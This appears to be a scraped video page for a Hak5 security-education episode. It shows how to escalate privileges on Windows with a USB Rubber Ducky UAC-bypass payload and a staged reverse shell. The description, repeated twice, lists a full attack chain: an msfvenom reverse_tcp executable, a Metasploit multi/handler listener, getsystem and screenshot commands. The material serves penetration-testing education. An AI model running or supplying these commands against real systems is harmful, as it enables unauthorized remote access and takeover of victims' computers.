Escalating Privileges in Windows & Staged Reverse Shells - Hak5 2117
Hak5 -- Cyber Security Education, Inspiration, News & Community since 2005:
____________________________________________
Privilege escalation on Windows, Meterpreter Reverse Shells and Staged Payloads with the USB Rubber Ducky. All that and more, this time on Hak5.
-------------------------------
Shop: http://www.hakshop.com
Support: http://www.patreon.com/threatwire
Subscribe: http://www.youtube.com/hak5
Our Site: http://www.hak5.org
Contact Us: http://www.twitter.com/hak5
------------------------------
Check out http://www.patreon.com/threatwire for our Patreon-only Audio RSS feed of Threat Wire!
git clone https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky
cd UAC-D-E-Rubber-Ducky
python uac-duck.py
Upload UAC-Duck-Payload.vbs to your host
Create the inject.bin payload file from our DuckyScript.txt using ducktoolkit.com and load it on the MicroSD card for the USB Rubber Ducky
We'll be using msfvenom to generate an executable reverse shell. Mubix has covered this in greater detail on Metasploit Minute - so check those episodes out.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.230.133 LPORT=4444 -f exe -o bob.exe
Next we'll upload it to the online host we specified in the python builder script
msfconsole
use exploit/multi/handler
set LHOST 192.168.230.133
set LPORT 4444
set ExitOnSession false
exploit -j
sessions
sessions -i 1
shell
whoami
exit
getsystem
shell
whoami
exit
screenshot
https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky
Enter our December giveaway! Details here: https://hakshop.com/pages/watchdogs2_giveaway
Shannon’s going to CES! Gonna have a meetup during the trade show in Vegas: https://www.facebook.com/TekThing/photos/a.314494088749101.1073741828.304982593033584/598542447010929/?type=3&theater
We will be at Shmoocon!
-~-~~-~~~-~~-~-
Please watch: "Bash Bunny Primer - Hak5 2225"
https://www.youtube.com/watch?v=8j6hrjSrJaM
-~-~~-~~~-~~-~-
____________________________________________
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community – where all hackers belong.
Видео Escalating Privileges in Windows & Staged Reverse Shells - Hak5 2117 канала Hak5
____________________________________________
Privilege escalation on Windows, Meterpreter Reverse Shells and Staged Payloads with the USB Rubber Ducky. All that and more, this time on Hak5.
-------------------------------
Shop: http://www.hakshop.com
Support: http://www.patreon.com/threatwire
Subscribe: http://www.youtube.com/hak5
Our Site: http://www.hak5.org
Contact Us: http://www.twitter.com/hak5
------------------------------
Check out http://www.patreon.com/threatwire for our Patreon-only Audio RSS feed of Threat Wire!
git clone https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky
cd UAC-D-E-Rubber-Ducky
python uac-duck.py
Upload UAC-Duck-Payload.vbs to your host
Create the inject.bin payload file from our DuckyScript.txt using ducktoolkit.com and load it on the MicroSD card for the USB Rubber Ducky
We'll be using msfvenom to generate an executable reverse shell. Mubix has covered this in greater detail on Metasploit Minute - so check those episodes out.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.230.133 LPORT=4444 -f exe -o bob.exe
Next we'll upload it to the online host we specified in the python builder script
msfconsole
use exploit/multi/handler
set LHOST 192.168.230.133
set LPORT 4444
set ExitOnSession false
exploit -j
sessions
sessions -i 1
shell
whoami
exit
getsystem
shell
whoami
exit
screenshot
https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky
Enter our December giveaway! Details here: https://hakshop.com/pages/watchdogs2_giveaway
Shannon’s going to CES! Gonna have a meetup during the trade show in Vegas: https://www.facebook.com/TekThing/photos/a.314494088749101.1073741828.304982593033584/598542447010929/?type=3&theater
We will be at Shmoocon!
-~-~~-~~~-~~-~-
Please watch: "Bash Bunny Primer - Hak5 2225"
https://www.youtube.com/watch?v=8j6hrjSrJaM
-~-~~-~~~-~~-~-
____________________________________________
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community – where all hackers belong.
Видео Escalating Privileges in Windows & Staged Reverse Shells - Hak5 2117 канала Hak5
Показать
Комментарии отсутствуют
Информация о видео
Другие видео канала
Elevating your Windows Privileges Like a Boss! - Jake WilliamsAdvanced Netcat and TCP Fun - Hak5 1922Stealing Data Over Open WiFiAccess Internal Networks with Reverse VPN connections - Hak5 1921Advanced NMap Techniques - Hak5 2415Exploding USB Drives - Hak5 2407Privilege Escalation FTWEncyclopaedia Of Windows Privilege Escalation - Brett MooreHow to Get a Reverse Shell in 3 Seconds with the USB Rubber Ducky - Hak5 2110Use Netcat to Spawn Reverse Shells & Connect to Other Computers [Tutorial]Disabling Defender With Viss Episode 1 - Hak5 2416How to Tether Without The Fees - Hak5 2111Linux Privilege Escalation - Tradecraft Security Weekly #22Level Up! Practical Windows Privilege Escalation - Andrew SmithNetcat 101: Remote Shells in Windows, HakTip 86Tracking Phones with Infrared and IRis - Hak5 2121Unlimited LTE Hotspot on PC via Phone or USB modem! -GlytchTipsHakTip - How to Capture Packets with Wireshark - Getting StartedThe Bash Bunny 1990's Prank - Hak5 2226Privilege escalation and Persistency Win7